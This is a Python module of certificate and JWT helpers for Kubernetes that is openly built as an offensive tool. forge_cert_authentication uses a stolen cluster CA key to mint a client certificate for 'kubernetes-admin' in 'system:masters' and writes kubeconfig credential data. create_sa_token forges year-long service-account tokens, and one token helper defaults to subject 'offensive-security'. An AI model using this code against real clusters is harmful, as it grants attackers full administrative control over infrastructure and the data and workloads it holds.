from cryptography.hazmat.primitives.serialization import load_pem_private_key, load_pem_public_key from cryptography.hazmat.primitives import serialization from cryptography.hazmat.primitives.asymmetric import padding from cryptography import x509 from cryptography.hazmat.primitives import hashes from cryptography.hazmat.primitives.asymmetric import padding from cryptography.hazmat.backends import default_backend from cryptography.exceptions import InvalidSignature from cryptography.hazmat.primitives.asymmetric import rsa from cryptography.x509.oid import NameOID import datetime import base64 import hashlib import jwt import json # fetch server CA from API server unauth?? def generate_private_key(keysize=2048, exp=65537): private_key = rsa.generate_private_key( public_exponent=exp, key_size=keysize ) return private_key.private_bytes(encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption()) def private_key_to_disk(key_obj, output_file): open(output_file, 'wb').write(key_obj.private_bytes(encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption())) def private_key_from_file(key_file): return load_pem_private_key(open(key_file, 'rb').read(), password=None) def cert_from_file(cert_file): return x509.load_pem_x509_certificate(data=open(cert_file, 'rb').read(), backend=default_backend()) def public_key_from_private(key_file): return private_key_from_file(key_file).public_key() def cert_to_pem(cert): return cert.public_bytes(encoding=serialization.Encoding.PEM) def key_to_pem(key): return key.private_bytes(encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption()) def pub_key_to_pem(pub): return pub.public_bytes(encoding=serialization.Encoding.PEM, format=serialization.PublicFormat.PKCS1) # TODO: Write this properly, use verify_directly_issued_by def verify_cert_from_cert(cert_file, signing_cert_file, padder=padding.PKCS1v15()): '''Doesnt work as well as .verify_directly_issued_by() misses issuer/subject match but checks signing''' chain = cert_from_file(signing_cert_file) issuer_public_key = chain.public_key() cert_to_check = cert_from_file(cert_file) try: issuer_public_key.verify( cert_to_check.signature, cert_to_check.tbs_certificate_bytes, padder, cert_to_check.signature_hash_algorithm, ) return True except InvalidSignature: return False except: raise def match_cert_and_key(cert_file, key_file): cert = cert_from_file(cert_file) cert_key = cert.public_key() pub_key = public_key_from_private(key_file) return cert_key == pub_key def verify_cert_from_key(cert_file, key_file, padder=padding.PKCS1v15()): issuer_public_key = public_key_from_private(key_file) cert_to_check = cert_from_file(cert_file) try: issuer_public_key.verify( cert_to_check.signature, cert_to_check.tbs_certificate_bytes, padder, cert_to_check.signature_hash_algorithm, ) return True except InvalidSignature: return False except: raise # system might need to be set for unicode strings...? def create_certificate(public_key, signer_key, signer_ca, exp=365, common_name='kubernetes-admin', org_names = ['system:masters'], verify=True): one_day = datetime.timedelta(1, 0, 0) builder = x509.CertificateBuilder() orgs = [x509.NameAttribute(NameOID.ORGANIZATION_NAME, a) for a in org_names] builder = builder.subject_name(x509.Name(orgs + [x509.NameAttribute(NameOID.COMMON_NAME, common_name)])) builder = builder.issuer_name(signer_ca.subject) # not working when I set this manually, why? builder = builder.not_valid_before(datetime.datetime.today() - one_day) builder = builder.not_valid_after(datetime.datetime.today() + (one_day * exp)) builder = builder.serial_number(x509.random_serial_number()) builder = builder.public_key(public_key) builder = builder.add_extension( x509.KeyUsage(digital_signature=True, key_encipherment=True, key_cert_sign=False, key_agreement=False, content_commitment=False, data_encipherment=False, crl_sign=False, encipher_only=False, decipher_only=False), critical=True ) builder = builder.add_extension( x509.ExtendedKeyUsage([x509.oid.ExtendedKeyUsageOID.CLIENT_AUTH]), critical=False ) builder = builder.add_extension( x509.BasicConstraints(ca=False, path_length=None), critical=True, ) builder = builder.add_extension( x509.AuthorityKeyIdentifier.from_issuer_public_key(signer_key.public_key()), critical=False ) certificate = builder.sign( private_key=signer_key, algorithm=hashes.SHA256(), ) # sanity check, verifies issuer/subject and key sign if verify: certificate.verify_directly_issued_by(signer_ca) return certificate def cert_to_disk(cert_obj, output_filename): open(output_filename, 'wb').write(cert_obj.public_bytes(encoding=serialization.Encoding.PEM)) def dump_cert_auth(cert, key): out = ' client-certificate-data: {}\n'.format(base64.b64encode(cert_to_pem(cert)).decode('utf8')) out += ' client-key-data: {}\n'.format(base64.b64encode(key_to_pem(key)).decode('utf8')) return out def create_token_rsa(key, keyid, exp_window=3600, audience='theia-web-shell', subject='offensive-security', issuer='custom-auth'): '''Helper function to generate authentication tokens''' t = int(datetime.datetime.timestamp(datetime.datetime.now(datetime.timezone.utc))) iat = t nbf = t exp = iat + exp_window sd = {'exp' : exp, 'iat': iat, 'nbf' : nbf, 'iss': issuer, 'sub': subject, 'aud': audience} return jwt.encode(sd, key, algorithm='RS256', headers={'kid': keyid}) def forge_cert_authentication(ca_key_file, ca_cert_file, user_name='kubernetes-admin', user_key_file=None, permissions=['system:masters'], cert_expiry_days=365): ca_key = private_key_from_file(ca_key_file) ca_cert = cert_from_file(ca_cert_file) user_key = None if not user_key_file: user_key = rsa.generate_private_key(public_exponent=65537, key_size=2048) else: user_key = private_key_from_file(user_key_file) forged_cert = create_certificate(user_key.public_key(), ca_key, ca_cert, exp=cert_expiry_days, common_name=user_name, org_names=permissions) return dump_cert_auth(forged_cert, user_key) def b64dec(val): return base64.urlsafe_b64decode(val + '==') def gen_public_key_keyid(pub_key_obj): return base64.urlsafe_b64encode(hashlib.sha256(pub_key_obj.public_bytes(encoding=serialization.Encoding.DER, format=serialization.PublicFormat.SubjectPublicKeyInfo)).digest()).decode().rstrip('=') def create_sa_token(sa_key, serviceaccount_name, serviceaccount_uid, namespace='default', aud='https://kubernetes.default.svc.cluster.local', iss='https://kubernetes.default.svc.cluster.local'): t = int(datetime.datetime.timestamp(datetime.datetime.now(datetime.timezone.utc))) exp = 31536000 sd = {'aud': [aud], 'exp': t+exp, 'iat': t, 'iss': iss, 'kubernetes.io': { 'namespace': namespace, 'serviceaccount': {'name': serviceaccount_name, 'uid': serviceaccount_uid} }, 'nbf': t, 'sub': 'system:serviceaccount:{}:{}'.format(namespace, serviceaccount_name)} keyid = gen_public_key_keyid(sa_key.public_key()) return jwt.encode(sd, sa_key, algorithm='RS256', headers={'kid': keyid}) def verify_sa_token(sa_pub_key, token): audience = json.loads(b64dec(token.split('.')[1]).decode())['aud'] return jwt.decode(token, sa_pub_key, 'RS256', audience=audience)